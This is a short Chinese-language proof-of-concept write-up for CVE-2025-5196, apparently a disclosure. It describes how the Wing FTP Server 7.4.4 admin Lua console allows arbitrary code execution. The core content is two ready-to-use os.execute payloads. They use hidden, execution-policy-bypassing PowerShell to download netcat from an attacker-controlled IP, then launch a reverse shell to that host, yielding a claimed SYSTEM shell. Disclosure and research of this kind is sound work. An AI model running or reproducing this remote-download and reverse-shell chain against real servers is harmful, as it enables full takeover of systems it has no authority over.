
Wing FTP Server 通过其 Web 界面提供了一个管理性的 Lua 脚本控制台。经过身份验证的管理员能够在沙箱隔离不足的情况下执行任意 Lua 代码。CVE-2025-5196
Wing FTP Server 提供了一个可通过其 Web 界面访问的管理 Lua 脚本控制台。经过身份验证的管理员能够执行任意 Lua 代码,但其沙箱机制不足。
受影响版本:Wing FTP Server 7.4.4 (Windows) | 需要身份验证:是
截至2025年5月24日,供应商提供的最新版本应用程序可通过以下链接获取:https://www.wftpserver.com/download.htm
此外,需要注意的是,截至同一日期,已发布一则发布说明,告知在7.4.4版本中修复了该RCE漏洞。发布说明的链接可在此处找到:https://www.wftpserver.com/serverhistory.htm

与 CVE-2025-5196 相关的 PoC VulDB

Wing FTP Server Web 界面


命令的第一部分会将 nc.exe(适用于 Windows x86 的 netcat)下载到路径 "C:\Users\usuario\Desktop\Drops"。第二部分将执行 nc.exe 192.168.234.131 4443 -e cme.exe。
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

NT/SYSTEM Shell
